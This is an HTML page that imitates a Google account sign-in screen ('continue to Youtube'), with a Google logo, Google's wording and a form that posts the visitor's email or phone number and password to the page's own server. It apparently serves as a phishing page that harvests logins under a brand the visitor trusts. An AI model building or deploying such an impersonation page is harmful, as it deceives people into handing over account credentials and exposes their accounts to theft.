<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <link rel="stylesheet" href="/static/gform.css">
    <script src="https://code.iconify.design/iconify-icon/1.0.7/iconify-icon.min.js"></script>
</head>
<body>

    <section>
    <form class="form" method="post"> 
        <img class="google" src="/static/pictures/google-logo.png" alt="">

        
        <p>continue to Youtube create youtube account</p>
        <input  type="text" name="name" placeholder="Email or phone">
        <br><br>
        <input  type="password" name="password" placeholder="Password">
        
        <p>Not your computer? Use Guest mode to sign in privately.</p>
        <h5 class="blue">Learn more</h5>
        <div class="account    flex-div">
        <input class="button" type="submit" value="create">
        </div>
        
    </form>

    <div class="footer flex-div">
        <p>‪English (United States)‬</p>
        <p>help privacy States</p>
    </div>
    </section>
</body>
</html>